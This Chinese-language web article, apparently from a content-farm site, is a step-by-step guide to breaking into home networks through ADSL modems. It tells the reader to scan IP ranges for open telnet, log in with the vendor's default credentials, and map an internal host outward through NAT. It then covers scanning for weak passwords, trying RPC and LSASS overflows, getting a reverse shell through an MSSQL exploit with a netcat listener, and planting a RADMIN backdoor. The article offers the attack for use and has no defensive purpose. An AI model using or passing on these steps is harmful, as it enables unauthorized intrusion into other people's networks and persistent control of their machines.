- 相關推薦
如何穿透ADSL路由來入侵內網
網絡信息時代現在是如此蓬勃的發展,不掌握一些黑科技都不好出門了,下面是由百分網小編為大家準備的如何穿透ADSL路由入侵內網,喜歡的可以收藏一下!了解更多詳情資訊,請關注應屆畢業生考試網!
穿透ADSL路由入侵內網方法:
1.掃描
現在很多ADSL MODEM都是通過80 23 21三個端口來管理,但80 21端口有很多服務器都有打開,沒怎么特征性,于是選擇了23端口,打開SUPPERSCAN,填上所在地區的IP段,跨多幾段都沒關系,反正SUPPERSCAN的速度就是快)眨眼間,結果出來了,開23的主機還真不小啊:)我挑了幾臺出來,在瀏覽器那里輸入IP:218.xxx.xxx.xxx,OK。登陸對話框出來了,輸入USER:ADSL pass:adsl1234(因為這里的adsl modem一般是華碩的,缺省是adsl adsl1234)bingle 一矢中的。
2.映射
入侵已經成功了一半,要進一步入侵內網,要進行端口映射,但是連內網的拓撲,都不知道(更不用說內網主機的端口開放情況了)又怎么映射呢?一般來說,MODEM的內網IP缺省是192.168.1.1,而大多數就把自己主機的IP設成192.168.1.2。因此只要試試把192.168.1.2的端口映射出來就行了(但如果使用了dhcp就麻煩了)把整臺主機透明地映射到外網,具體做法如下:進入NAT選項---添加NAT規則---BAMID---填入主機IP:192.168.1.2,到此192.168.1.2已經透明地映射到192.168.1.1上了,訪問ADSL MODEM就等于訪問主機192.168.1.2了。
3.檢測漏洞
現在再請出SUPPERSCAN對218。xxx.xxx.xxx進行掃描,掃描結果已經不同了,開放的端口是139 1433等,剛才只是開放了80 23 21而已(也就是說映射已經成功了)該是X-SCAN出手了,掃弱口令最好不過了。
4.溢出
既然沒有弱口令,也沒開80,那只好從逸出方面著手了,但沒開80 21 也就webdav .sevr-u的溢出沒戲了,向導了RPC溢出,但實踐證明RPC溢出也是不行的,LSASS溢出也不行。
5.募然回首,那人卻在,燈火闌珊處
這時侯,目光轉移到1433上了,于是nc -v -l 99 sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99 bingle 成功地得到一個shell了。
6.設置后門
到這里,入侵已經成功了,余下的是掃尾留后門,至于后門,用FTP上傳RADMIN上去就可以了。
【如何穿透ADSL路由來入侵內網】相關文章:
如何穿透ADSL路由入侵內網08-29
如何提高局域網內網速07-28
如何檢查Linux是否被入侵07-21
ADSL是什么09-04
ADSL是什么呢?08-25
ADSL是什么意思10-31
有線寬帶與ADSL的區別07-31
ADSL上網掉線怎么辦07-12
內網滲透怎么進行網絡環境判斷08-16